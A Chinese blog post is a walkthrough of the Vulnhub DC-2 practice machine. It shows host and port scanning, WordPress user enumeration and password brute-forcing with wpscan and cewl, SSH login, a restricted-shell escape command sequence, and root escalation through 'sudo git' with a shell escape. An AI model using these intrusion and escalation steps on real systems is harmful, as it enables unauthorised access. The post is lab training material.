DC系列(2)DC-2靶机渗透

最新推荐文章于 2024-03-20 23:38:08 发布
最新推荐文章于 2024-03-20 23:38:08 发布
阅读量969 收藏 1
点赞数
分类专栏: DC靶机 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43577567/article/details/122294044
版权

DC-2

官网下载及要求、wp等:https://www.vulnhub.com/entry/dc-2,311/
官解:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC2

0x00 要求&准备

  1. 把DC-2.ova导入虚拟机,具体见DC-1。
  2. 官网提示:五个flag(包含一个真正有用的thefinalflag),提示渗透机hosts设置成DC-2的实际IP。
    在这里插入图片描述
  3. 切换网络情况后,桥接模式又无法上网了。重新配置新kali时,显示网络自动配置失败。测试得到,校园网网速太慢/限制仅一台PC连接,所以无法配置桥接,开热点就好了。(这个结论说出来自己都觉得离谱,回去原来DC-1用的kali,也能成功上网,用回原本的kali)。

0x01 存活主机及访问——flag1

  1. 使用netdiscover无效,因为是从192.168.0.0开始遍历网段寻找,但本次实验中,kali的ip地址经查询,变成了172.20.10.3。
    在这里插入图片描述

  2. 所以使用nmap指定该网段扫描:nmap 172.20.10.0/24。找到vmware标识。即DC-2的地址为172.20.10.4。
    在这里插入图片描述

  3. 由nmap结果可以看到仅开放80端口,由提示知要将dc-2的地址加入/etc/hosts(否则无法访问):vim /etc/hosts
    在这里插入图片描述

  4. 成功访问170.20.10.4,发现是WordPress网站。且有flag项。
    在这里插入图片描述

  5. 找到flag1,提示:常用字典无效,需要cewl一个;登陆获取下一个flag。
    在这里插入图片描述

0x02 字典爆破——flag2

  1. 用户枚举:wpscan --url http://dc-2/ --enumerate u,找到三个用户名:admin、jerry、tom。

    wpscan使用参考:https://www.freebuf.com/sectool/174663.html

    在这里插入图片描述
    在这里插入图片描述

  2. 创建用户列表:vim dc2users.list,写入枚举出的三个用户。
    在这里插入图片描述

  3. 按照提示,使用cewl生成wordlist:cewl dc-2 -w dc2passwd.dic,使用cat查看。

    cewl使用参考:https://www.freebuf.com/articles/network/190128.html

    在这里插入图片描述

  4. WPScan爆破:wpscan --url dc-2 -U dc2users.list -P dc2passwd.dic。跑出结果:jerry对应密码adipiscing、tom对应密码parturient,admin没找到。
    在这里插入图片描述
    在这里插入图片描述

  5. 用nikto寻找访问界面:nikto -h dc-2,为/wp-login.php

    nikto使用参考:https://zhuanlan.zhihu.com/p/124246499

    在这里插入图片描述

  6. 进入登陆网页,分别用tom和Jerry登陆。其中tom登录后没有找到有用信息。
    在这里插入图片描述

  7. 使用Jerry登陆,找到flag1和flag2。
    在这里插入图片描述

  8. 其中flag2提示:不能利用wordpress抄近路时,有另一个切入点。
    在这里插入图片描述

0x03 登陆——flag3

  1. 前文nmap中只扫描出了80端口,再重新全端口扫描一下:nmap -sS -p- 172.20.10.4。多了7744端口。
    在这里插入图片描述

  2. 试试7744端口登陆前文未用上的tom用户:ssh tom@172.20.10.4 -p 7744,密码parturient。登陆成功。
    在这里插入图片描述

  3. 登录后ls找到flag3.txt,但无法cat,但可以用vi打开查看。
    在这里插入图片描述

  4. 看到flag3:tom在Jerry后,提示用su切换用户。

在这里插入图片描述

0x04 rbash限制——flag4

rbash逃逸参考:
https://xz.aliyun.com/t/7642
https://www.cnblogs.com/sup3rman/p/12392161.html

  1. 失败的尝试:切换用户时逃逸(su不可用),无法直接/bin/bash,直接用export提示PATH是只读变量。

  2. 依次执行以下命令,成功绕过限制。

    BASH_CMDS[a]=/bin/sh;a        #把/bin/bash给a变量
/bin/bash                  
echo $0                       #查看脚本本身的名字
echo $?                       #命令执行结果反馈,0代表执行成功,其余数字表示不成功
export PATH=$PATH:/bin/       #将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin    #将/usr/bin作为PATH环境变量导出

    在这里插入图片描述

  3. 切换Jerry账户,登陆成功后切换到Jerry的目录下,找到flag4.txt。
    在这里插入图片描述

  4. flag4提示:没有提示,继续,git
    在这里插入图片描述

0x05 git提权——flag5/finalflag

第三方提权(包括git提权)参考:
https://www.freebuf.com/articles/system/261271.html

  1. 执行sudo git -p help config
    在这里插入图片描述

  2. 在末行命令模式输入!/bin/sh,并且用whoami查看当前用户,完成提权。
    在这里插入图片描述

  3. 打开root根目录,找到finalflag.txt。cat查看。结束。
    在这里插入图片描述

Nikris
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2703
DC-2靶机渗透测试思路及流程
DC-2靶机渗透全流程详细
最新发布
qq_63940076的博客
03-20 1379
执行x的时候就相当于在执行shell这个同样是需要设置环境变量,这里就不再赘述获得命令权限后,我们寻找下一个flag找到flag3,提示susu是切换账户的命令,现在我们唯一另外的账户就是jerry,试试吧账号:jerry 密码:adipiscing密码来自于前面WPScan爆破所得Ok,查看权限查找下一个flagFlag4提示git,应该是要提权,一般最后一个flag都是提权到root。
DC-2靶机渗透
weixin_41082546的博客
08-11 4085
首先获取目标主机ip netdiscover -i eth0 -r 192.168.88.1/24 对端口进行扫描,只开放了web服务 于是访问web 这里配置本地dns解析,将目标ip地址添加进hosts 成功访问,发现是wordpress。 此处提示我们使用cewl生成一个通用的字典,并且告诉了我们flag的位置。 先使用dirb 做一个简单的目...
DC-2靶机实战 渗透测试
她叫常玉莹
07-20 600
DC-2主机发现 信息搜集Flag1Flag2Flag3Flag4Final-flag 主机发现 信息搜集 nmap主机发现 我们的靶机地址是:192.168.0.131 nmap扫描 nmap -A -T4 -p- 192.168.0.131 80端口跑着http 7744端口跑着ssh Flag1 访问下80 无法访问这里修改下hosts文件 linux中hosts文件位置 /etc/hosts 这回可以正常访问了,这里有个重定向直接跳转dc-2 在主页中找到找到了flag1 flag1中
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
dc-4靶机练习.docx
01-02
第一步;靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
DC-4-Web渗透测试靶机
01-19
DC-4
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
9.100个渗透测试实战#9(DC-4)
01-09
世间一切皆可努力  感谢浏览 目录   一、实验环境 二、实验流程 三、实验步骤 (一)信息收集——主机发现阶段 1.查看kali的网卡、IP等信息;(网卡名:eth0,IP地址:192.168.97.129) 2.查看靶机页面; 3.探测特
学习测试day_5
bgxeg的博客
11-29 198
#define _CRT_SECURE_NO_WARNINGS 1 #include<stdio.h> #include<string.h> #include<windows.h> #include<stdlib.h> int main() { int i = 0; char password[20] = { 0 }; printf(“请输入密码:>”); scanf("%s", password); for (i = 0; i < 3; i++)
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
DC-2 靶机渗透
Rex_Surprise的博客
05-10 193
DC-2靶机渗透 1. 渗透过程 !!!THE_ENT!!! 2. 重要信息 DC-2靶机渗透1. 渗透过程 主机发现: nmap -sP 192.168.0.1/24 发现了DC-2的IP地址: 192.168.0.131 下载主机的时候要添加dns到hosts文件 echo “192.168.0.131 dc-2 ” &gt...
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1896
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值